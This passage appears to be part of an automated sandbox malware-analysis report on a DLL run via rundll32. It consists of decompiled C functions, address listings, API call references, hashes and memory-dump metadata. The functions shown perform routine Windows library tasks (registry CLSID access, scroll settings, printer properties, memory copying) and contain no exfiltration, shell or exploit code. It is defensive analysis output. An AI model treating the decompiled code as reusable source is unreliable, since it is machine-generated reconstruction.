					} while (_t104 != 0);
					goto L16;
				}
			}


















                                                                                                        0x10035404
                                                                                                        0x1003540b
                                                                                                        0x1003540f
                                                                                                        0x10035416
                                                                                                        0x1003541c
                                                                                                        0x10035423
                                                                                                        0x1003542e
                                                                                                        0x10035434
                                                                                                        0x1003543a
                                                                                                        0x1003543d
                                                                                                        0x10035440
                                                                                                        0x1003544c
                                                                                                        0x10035451
                                                                                                        0x10035455
                                                                                                        0x1003545b
                                                                                                        0x1003545e
                                                                                                        0x10035463
                                                                                                        0x1003546e
                                                                                                        0x10035481
                                                                                                        0x10035481
                                                                                                        0x1003548a
                                                                                                        0x1003548d
                                                                                                        0x10035491
                                                                                                        0x10035495
                                                                                                        0x1003549c
                                                                                                        0x10035558
                                                                                                        0x1003555b
                                                                                                        0x10035566
                                                                                                        0x10035571
                                                                                                        0x1003557c
                                                                                                        0x10035584
                                                                                                        0x10035585
                                                                                                        0x10035586
                                                                                                        0x1003559b
                                                                                                        0x100354a2
                                                                                                        0x100354a8
                                                                                                        0x100354a8
                                                                                                        0x100354af
                                                                                                        0x100354ca
                                                                                                        0x100354d2
                                                                                                        0x100354e7
                                                                                                        0x100354ef
                                                                                                        0x100354f2
                                                                                                        0x10035501
                                                                                                        0x10035523
                                                                                                        0x10035523
                                                                                                        0x10035527
                                                                                                        0x10035536
                                                                                                        0x1003553e
                                                                                                        0x10035552
                                                                                                        0x10035554
                                                                                                        0x10035554
                                                                                                        0x00000000
                                                                                                        0x10035552
                                                                                                        0x00000000
                                                                                                        0x1003553e
                                                                                                        0x10035507
                                                                                                        0x1003550f
                                                                                                        0x1003551e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10035520
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100354f2
                                                                                                        0x10035540
                                                                                                        0x10035543
                                                                                                        0x10035545
                                                                                                        0x00000000
                                                                                                        0x1003554d

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10035423
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,CLSID,00000000,00020019,00000000,00000000,00000000,00000024), ref: 10035481
                                                                                                        • lstrlenA.KERNEL32(?,00000000,00000000,00000024), ref: 100354BB
                                                                                                        • RegQueryValueA.ADVAPI32(?,?,?,?), ref: 10035516
                                                                                                        • lstrlenA.KERNEL32(?,?,?,?), ref: 1003552A
                                                                                                        • RegSetValueA.ADVAPI32(?,?,00000001,?,00000000), ref: 10035536
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Valuelstrlen$H_prolog3OpenQuery
                                                                                                        • String ID: CLSID
                                                                                                        • API String ID: 2019324235-910414637
                                                                                                        • Opcode ID: 4c4938c985efefa734c19c3610df5f4946220f96e44b0273001cdd498358f56c
                                                                                                        • Instruction ID: edc0b3564acc80adf763340bfe9e17e7942613623c0a78a1956e35ec68a7733d
                                                                                                        • Opcode Fuzzy Hash: 4c4938c985efefa734c19c3610df5f4946220f96e44b0273001cdd498358f56c
                                                                                                        • Instruction Fuzzy Hash: 6F516A75D002599FDF12DFA4C885BEEB7B5FF08356F10001AE901BB290D775AA44CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100348E3, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E100348E3(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t32;
				void* _t34;
				intOrPtr _t35;
				char* _t36;
				int _t38;
				CHAR* _t40;
				CHAR* _t43;
				void* _t45;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				CHAR* _t54;
				void* _t56;
				int _t57;
				intOrPtr _t58;
				void* _t62;

				_t52 = __edx;
				_t50 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_push(_t45);
				_push(_t56);
				_t54 = _a4;
				_push(0xffffffff);
				_t32 = E10029AAF(_t54);
				_t67 = _t32;
				if(_t32 == 0) {
					E1000836F(_t45, __ecx, _t54, _t56, _t67);
				}
				_t57 = lstrlenA(_t54);
				_v8 = _t57;
				_t34 = E100348A5(_t50, _t54, 0, 0);
				_t51 = _v8;
				_t47 = _t34 - 1;
				_t58 = _t57 - _t47;
				_t35 = _t58 + _t54;
				_v12 = _t35;
				if(_a8 < _t51) {
					if(_a8 >= _t47) {
						__eflags =  *_t54 - 0x5c;
						_t36 =  &(_t54[2]);
						_a4 = _t36;
						if( *_t54 == 0x5c) {
							__eflags = _t54[1] - 0x5c;
							if(_t54[1] == 0x5c) {
								while(1) {
									__eflags =  *_t36 - 0x5c;
									if( *_t36 == 0x5c) {
										goto L13;
									}
									_t36 = E1003F61F(_t52, _t54, _a4);
									_pop(_t51);
									_a4 = _t36;
								}
							}
						}
						L13:
						__eflags = _t58 - 3;
						if(_t58 > 3) {
							do {
								_t43 = E1003F61F(_t52, _t54, _a4);
								__eflags =  *_t43 - 0x5c;
								_a4 = _t43;
								_pop(_t51);
							} while ( *_t43 != 0x5c);
						}
						_t58 = _a4 - _t54;
						__eflags = _a8 - _t58 + _t47 + 5;
						if(_a8 >= _t58 + _t47 + 5) {
							_t49 = lstrlenA;
							while(1) {
								_t38 = lstrlenA(_a4);
								__eflags = _t38 + _t58 + 4 - _a8;
								if(_t38 + _t58 + 4 > _a8) {
									goto L18;
								} else {
									break;
								}
								do {
									L18:
									_t40 = E1003F61F(_t52, _t54, _a4);
									__eflags =  *_t40 - 0x5c;
									_pop(_t51);
									_a4 = _t40;
								} while ( *_t40 != 0x5c);
							}
							__eflags = _t58;
							if(_t58 < 0) {
								L22:
								_t58 = _a8;
							} else {
								__eflags = _t58 - _a8;
								if(_t58 >= _a8) {
									goto L22;
								}
							}
							_t61 = _t58 + _t54;
							__eflags = _t58 + _t54;
							E10001000(_t49, _t54, _t61, E1003A7F6(_t49, _t51, _t61, 5, "\\...", 5));
							_t35 = E1001C44E(_t49, _t52, _t54, _t61, _t62, _t54, _v8, _a4);
						} else {
							_push(_v12);
							_push(_v8);
							goto L7;
						}
					} else {
						if(_a12 != 0) {
							_push(_t35);
							_push(_t51);
							L7:
							_push(_t54);
							_t35 = E10025E38(_t47, _t52, _t54, _t58, _t62);
						} else {
							 *_t54 = 0;
						}
					}
				}
				return _t35;
			}


























                                                                                                        0x100348e3
                                                                                                        0x100348e3
                                                                                                        0x100348e6
                                                                                                        0x100348e7
                                                                                                        0x100348e8
                                                                                                        0x100348e9
                                                                                                        0x100348eb
                                                                                                        0x100348ee
                                                                                                        0x100348f1
                                                                                                        0x100348f6
                                                                                                        0x100348f8
                                                                                                        0x100348fa
                                                                                                        0x100348fa
                                                                                                        0x1003490a
                                                                                                        0x1003490d
                                                                                                        0x10034910
                                                                                                        0x10034915
                                                                                                        0x1003491a
                                                                                                        0x1003491b
                                                                                                        0x10034920
                                                                                                        0x10034923
                                                                                                        0x10034926
                                                                                                        0x1003492f
                                                                                                        0x1003494f
                                                                                                        0x10034952
                                                                                                        0x10034955
                                                                                                        0x10034958
                                                                                                        0x1003495a
                                                                                                        0x1003495e
                                                                                                        0x1003496e
                                                                                                        0x1003496e
                                                                                                        0x10034971
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10034965
                                                                                                        0x1003496a
                                                                                                        0x1003496b
                                                                                                        0x1003496b
                                                                                                        0x1003496e
                                                                                                        0x1003495e
                                                                                                        0x10034973
                                                                                                        0x10034973
                                                                                                        0x10034976
                                                                                                        0x10034978
                                                                                                        0x1003497b
                                                                                                        0x10034980
                                                                                                        0x10034983
                                                                                                        0x10034986
                                                                                                        0x10034986
                                                                                                        0x10034978
                                                                                                        0x1003498c
                                                                                                        0x10034992
                                                                                                        0x10034995
                                                                                                        0x1003499f
                                                                                                        0x100349b8
                                                                                                        0x100349bb
                                                                                                        0x100349c1
                                                                                                        0x100349c4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100349a7
                                                                                                        0x100349a7
                                                                                                        0x100349aa
                                                                                                        0x100349af
                                                                                                        0x100349b2
                                                                                                        0x100349b3
                                                                                                        0x100349b3
                                                                                                        0x100349a7
                                                                                                        0x100349c6
                                                                                                        0x100349c8
                                                                                                        0x100349cf
                                                                                                        0x100349cf
                                                                                                        0x100349ca
                                                                                                        0x100349ca
                                                                                                        0x100349cd
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100349cd
                                                                                                        0x100349db
                                                                                                        0x100349db
                                                                                                        0x100349e4
                                                                                                        0x100349f0
                                                                                                        0x10034997
                                                                                                        0x10034997
                                                                                                        0x1003499a
                                                                                                        0x00000000
                                                                                                        0x1003499a
                                                                                                        0x10034931
                                                                                                        0x10034935
                                                                                                        0x1003493f
                                                                                                        0x10034940
                                                                                                        0x10034941
                                                                                                        0x10034941
                                                                                                        0x10034942
                                                                                                        0x10034937
                                                                                                        0x10034937
                                                                                                        0x10034937
                                                                                                        0x10034935
                                                                                                        0x1003492f
                                                                                                        0x100349fc

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?,?,000000FF), ref: 10034900
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                          • Part of subcall function 10025E38: _strcpy_s.LIBCMT ref: 10025E44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                                                                                                        • String ID: \...
                                                                                                        • API String ID: 2411880420-1167917071
                                                                                                        • Opcode ID: 7ebd0e065f7e0f8261fabf429e50be93d96acefaedd4a01b35c5769590fda5e9
                                                                                                        • Instruction ID: 23a99ee26fe3352073cc3c031fbde906da005f448bef751663056bbc433d0a58
                                                                                                        • Opcode Fuzzy Hash: 7ebd0e065f7e0f8261fabf429e50be93d96acefaedd4a01b35c5769590fda5e9
                                                                                                        • Instruction Fuzzy Hash: B831B379804249BEEB12CF60CC81B9F7BA4EB01392F13815BF9546E151EB34BE80CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10032191, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43windowregistryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10032191() {
				void _t1;
				struct HWND__* _t3;
				int _t5;
				int _t6;
				intOrPtr _t8;
				intOrPtr _t9;
				short _t10;

				_t8 =  *0x10097508; // 0x0
				if(_t8 != 0) {
					L11:
					_t1 =  *0x100991f4; // 0x0
					return _t1;
				}
				_t9 =  *0x10099164; // 0x0
				 *0x10097508 = 1;
				if(_t9 == 0) {
					 *0x100991f4 = 3;
					SystemParametersInfoA(0x68, 0, 0x100991f4, 0);
					goto L11;
				}
				_t10 =  *0x100991fc; // 0x0
				if(_t10 != 0) {
					L6:
					if( *0x100991fc == 2) {
						_t3 = FindWindowA("MouseZ", "Magellan MSWHEEL");
						if(_t3 != 0) {
							_t6 =  *0x100991f8; // 0x0
							if(_t6 != 0) {
								 *0x100991f4 = SendMessageA(_t3, _t6, 0, 0);
							}
						}
					}
					goto L11;
				}
				_t5 = RegisterWindowMessageA("MSH_SCROLL_LINES_MSG");
				 *0x100991f8 = _t5;
				if(_t5 != 0) {
					 *0x100991fc = 2;
					goto L6;
				} else {
					 *0x100991fc = 1;
					goto L11;
				}
			}










                                                                                                        0x10032194
                                                                                                        0x1003219a
                                                                                                        0x10032235
                                                                                                        0x10032235
                                                                                                        0x1003223b
                                                                                                        0x1003223b
                                                                                                        0x100321a0
                                                                                                        0x100321a6
                                                                                                        0x100321b0
                                                                                                        0x10032225
                                                                                                        0x1003222f
                                                                                                        0x00000000
                                                                                                        0x1003222f
                                                                                                        0x100321b2
                                                                                                        0x100321b9
                                                                                                        0x100321e3
                                                                                                        0x100321eb
                                                                                                        0x100321f7
                                                                                                        0x100321ff
                                                                                                        0x10032201
                                                                                                        0x10032209
                                                                                                        0x10032215
                                                                                                        0x10032215
                                                                                                        0x10032209
                                                                                                        0x100321ff
                                                                                                        0x00000000
                                                                                                        0x100321eb
                                                                                                        0x100321c0
                                                                                                        0x100321c8
                                                                                                        0x100321cd
                                                                                                        0x100321da
                                                                                                        0x00000000
                                                                                                        0x100321cf
                                                                                                        0x100321cf
                                                                                                        0x00000000
                                                                                                        0x100321cf

                                                                                                        APIs
                                                                                                        • RegisterWindowMessageA.USER32(MSH_SCROLL_LINES_MSG,?,10032E2E,?,?,?), ref: 100321C0
                                                                                                        • FindWindowA.USER32 ref: 100321F7
                                                                                                        • SendMessageA.USER32 ref: 1003220F
                                                                                                        • SystemParametersInfoA.USER32(00000068,00000000,100991F4,00000000), ref: 1003222F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageWindow$FindInfoParametersRegisterSendSystem
                                                                                                        • String ID: MSH_SCROLL_LINES_MSG$Magellan MSWHEEL$MouseZ
                                                                                                        • API String ID: 4054807749-4062084571
                                                                                                        • Opcode ID: 321a152e966f862fa2d6c977898e6ffb590373fcfbc6b5d2ac9cb4234ab4388c
                                                                                                        • Instruction ID: 566a71785a45a982e63a39b7aafdbf4ee296ba1814393e036d7cdc7bb21956e8
                                                                                                        • Opcode Fuzzy Hash: 321a152e966f862fa2d6c977898e6ffb590373fcfbc6b5d2ac9cb4234ab4388c
                                                                                                        • Instruction Fuzzy Hash: 37015A34401237EEE75BCF09CDCCE9A3AA4F70D78AB01400BE61D9A1A0D7B40984CB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10026A32, Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 93%
                                                                                                        			E10026A32(void* __ecx, char* _a4) {
				void* _v8;
				void* _t15;
				void* _t20;
				void* _t35;

				_push(__ecx);
				_t35 = __ecx;
				_t15 =  *(__ecx + 0x74);
				if(_t15 != 0) {
					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
					if(_t15 == 0) {
						_t15 = OpenPrinterA(_a4,  &_v8, 0);
						if(_t15 != 0) {
							_t18 =  *(_t35 + 0x70);
							if( *(_t35 + 0x70) != 0) {
								E100297B1(_t18);
							}
							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
							 *(_t35 + 0x70) = _t20;
							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
								E100297B1( *(_t35 + 0x70));
								 *(_t35 + 0x70) = 0;
							}
							_t15 = ClosePrinter(_v8);
						}
					}
				}
				return _t15;
			}







                                                                                                        0x10026a35
                                                                                                        0x10026a37
                                                                                                        0x10026a39
                                                                                                        0x10026a41
                                                                                                        0x10026a5b
                                                                                                        0x10026a63
                                                                                                        0x10026a6d
                                                                                                        0x10026a74
                                                                                                        0x10026a76
                                                                                                        0x10026a7b
                                                                                                        0x10026a7e
                                                                                                        0x10026a7e
                                                                                                        0x10026a95
                                                                                                        0x10026a9c
                                                                                                        0x10026ab4
                                                                                                        0x10026ab9
                                                                                                        0x10026abe
                                                                                                        0x10026abe
                                                                                                        0x10026ac4
                                                                                                        0x10026ac4
                                                                                                        0x10026a74
                                                                                                        0x10026ac9
                                                                                                        0x10026acd

                                                                                                        APIs
                                                                                                        • GlobalLock.KERNEL32 ref: 10026A4F
                                                                                                        • lstrcmpA.KERNEL32(?,?), ref: 10026A5B
                                                                                                        • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10026A6D
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10026A8D
                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10026A95
                                                                                                        • GlobalLock.KERNEL32 ref: 10026A9F
                                                                                                        • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10026AAC
                                                                                                        • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10026AC4
                                                                                                          • Part of subcall function 100297B1: GlobalFlags.KERNEL32(?), ref: 100297BC
                                                                                                          • Part of subcall function 100297B1: GlobalUnlock.KERNEL32(?), ref: 100297CE
                                                                                                          • Part of subcall function 100297B1: GlobalFree.KERNEL32 ref: 100297D9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 168474834-0
                                                                                                        • Opcode ID: 1165fe8e980ef602a1d33f80695f4609020bd6e14c1fdcb869a18ffa74b77181
                                                                                                        • Instruction ID: 0e9a69045ef64a82a052e1c19841c0e81e1576c4a80d39e7c088a39ac51c58da
                                                                                                        • Opcode Fuzzy Hash: 1165fe8e980ef602a1d33f80695f4609020bd6e14c1fdcb869a18ffa74b77181
                                                                                                        • Instruction Fuzzy Hash: 33117C79500604BBDB12DBB5DC89D6F7AFDFF89B84750441AFA01E2121D731EA01DB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000AE74, Relevance: 12.1, APIs: 8, Instructions: 51memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000AE74(void* __ecx, void* _a4, void* _a8) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t10;
				void* _t12;
				void* _t14;
				void* _t21;
				void* _t25;
				void* _t32;

				_t25 = GlobalSize;
				_t10 = GlobalSize(_a8);
				_t21 = _a4;
				_v8 = _t10;
				if(_t21 != 0) {
					if(_v8 > GlobalSize(_t21)) {
						goto L2;
					} else {
						goto L4;
					}
				} else {
					_t21 = GlobalAlloc(0x2002, _t10);
					if(_t21 != 0) {
						L4:
						_a4 = GlobalLock(_a8);
						_t14 = GlobalLock(_t21);
						E10007E59(_t25, _t14, _t32, _t14, GlobalSize(_t21), _a4, _v8);
						GlobalUnlock(_t21);
						GlobalUnlock(_a8);
						_t12 = _t21;
					} else {
						L2:
						_t12 = 0;
					}
				}
				return _t12;
			}













                                                                                                        0x1000ae7d
                                                                                                        0x1000ae83
                                                                                                        0x1000ae85
                                                                                                        0x1000ae8a
                                                                                                        0x1000ae8d
                                                                                                        0x1000aeab
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000ae8f
                                                                                                        0x1000ae9b
                                                                                                        0x1000ae9f
                                                                                                        0x1000aead
                                                                                                        0x1000aeba
                                                                                                        0x1000aebd
                                                                                                        0x1000aecc
                                                                                                        0x1000aedb
                                                                                                        0x1000aee0
                                                                                                        0x1000aee2
                                                                                                        0x1000aea1
                                                                                                        0x1000aea1
                                                                                                        0x1000aea1
                                                                                                        0x1000aea1
                                                                                                        0x1000ae9f
                                                                                                        0x1000aee8

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Size$LockUnlock$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 2344174106-0
                                                                                                        • Opcode ID: ab99f5e5b1cf080de97b526d5757064fac85f5db4826d33b5b69dcac7ca7df73
                                                                                                        • Instruction ID: 00437f95888d8e729627b736a01413f4f87f9df8a85beca872755ae450b9b6d4
                                                                                                        • Opcode Fuzzy Hash: ab99f5e5b1cf080de97b526d5757064fac85f5db4826d33b5b69dcac7ca7df73
                                                                                                        • Instruction Fuzzy Hash: D9017171900258BFEB00AF66CCC485F7FACEF446D47108166FD08A3111E670AE109BA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 100122B1, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 63%
                                                                                                        			E100122B1(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				char _v17;
				char _v18;
				signed int _v19;
				char _v28;
				long _v32;
				signed int _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t50;
				signed char _t57;
				void* _t68;
				void* _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				signed int _t89;

				_t86 = __edx;
				_t43 =  *0x10072650; // 0xb5e27fef
				_v8 = _t43 ^ _t89;
				_t87 = _a8;
				_t88 = __ecx;
				_push( &_v28);
				_push(_a4);
				_push(0x417);
				 *((intOrPtr*)( *__ecx + 0x110))();
				 *(_t87 + 8) =  *(_t87 + 8) ^ 0x00000004;
				_v18 = 0;
				_v17 = 0;
				 *((char*)(_t87 + 0xa)) = 0;
				 *((char*)(_t87 + 0xb)) = 0;
				if(E1003D322(_t87,  &_v28, 0x14) != 0) {
					_t50 = E10011632(_t88);
					_t69 = _t50;
					_v36 = _t50;
					E10011666(_t88, 0x10000000, 0, 0);
					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, _t68);
					if( *((intOrPtr*)(_t87 + 0x10)) < 0xffffffff) {
						_v32 = SendMessageA( *(_t88 + 0x20), 0x43d, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 0, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32 + 1, 0);
						SendMessageA( *(_t88 + 0x20), 0x43c, _v32, 0);
						SendMessageA( *(_t88 + 0x20), 0xb, 1, 0);
						 *((intOrPtr*)(_t87 + 0x10)) =  *((intOrPtr*)(_t87 + 0x10)) + 0xf4240;
						_t69 = _v36;
					}
					 *((intOrPtr*)( *_t88 + 0x110))(_a4, _t87);
					E10011666(_t88, 0, _t69 & 0x10000000, 0);
					_t57 =  *((intOrPtr*)(_t87 + 9));
					_t68 = 0x415;
					if(((_t57 ^ _v19) & 0x00000001) != 0 || (_t57 & 0x00000001) != 0 &&  *_t87 != _v28) {
						_push(1);
						_push(0);
						goto L9;
					} else {
						_push( &_v52);
						_push(_a4);
						_push(0x41d);
						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
							_push(1);
							_push( &_v52);
							L9:
							_t48 = InvalidateRect( *(_t88 + 0x20), ??, ??);
						}
					}
				}
				return E10039F21(_t48, _t68, _v8 ^ _t89, _t86, _t87, _t88);
			}






















                                                                                                        0x100122b1
                                                                                                        0x100122b7
                                                                                                        0x100122be
                                                                                                        0x100122c3
                                                                                                        0x100122c6
                                                                                                        0x100122cd
                                                                                                        0x100122ce
                                                                                                        0x100122d3
                                                                                                        0x100122d8
                                                                                                        0x100122de
                                                                                                        0x100122e9
                                                                                                        0x100122ed
                                                                                                        0x100122f1
                                                                                                        0x100122f5
                                                                                                        0x10012303
                                                                                                        0x1001230c
                                                                                                        0x10012315
                                                                                                        0x1001231e
                                                                                                        0x10012321
                                                                                                        0x10012334
                                                                                                        0x1001233e
                                                                                                        0x1001235d
                                                                                                        0x10012360
                                                                                                        0x10012371
                                                                                                        0x10012380
                                                                                                        0x1001238b
                                                                                                        0x1001238d
                                                                                                        0x10012394
                                                                                                        0x10012394
                                                                                                        0x100123a4
                                                                                                        0x100123b7
                                                                                                        0x100123bc
                                                                                                        0x100123c4
                                                                                                        0x100123c8
                                                                                                        0x100123f7
                                                                                                        0x100123f9
                                                                                                        0x00000000
                                                                                                        0x100123d5
                                                                                                        0x100123da
                                                                                                        0x100123db
                                                                                                        0x100123e0
                                                                                                        0x100123ed
                                                                                                        0x100123ef
                                                                                                        0x100123f4
                                                                                                        0x100123fb
                                                                                                        0x100123fe
                                                                                                        0x100123fe
                                                                                                        0x100123ed
                                                                                                        0x100123c8
                                                                                                        0x10012411

                                                                                                        APIs
                                                                                                        • _memcmp.LIBCMT ref: 100122F9
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                        • SendMessageA.USER32 ref: 10012352
                                                                                                        • SendMessageA.USER32 ref: 10012360
                                                                                                        • SendMessageA.USER32 ref: 10012371
                                                                                                        • SendMessageA.USER32 ref: 10012380
                                                                                                        • SendMessageA.USER32 ref: 1001238B
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 100123FE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$InvalidateLongRectWindow_memcmp
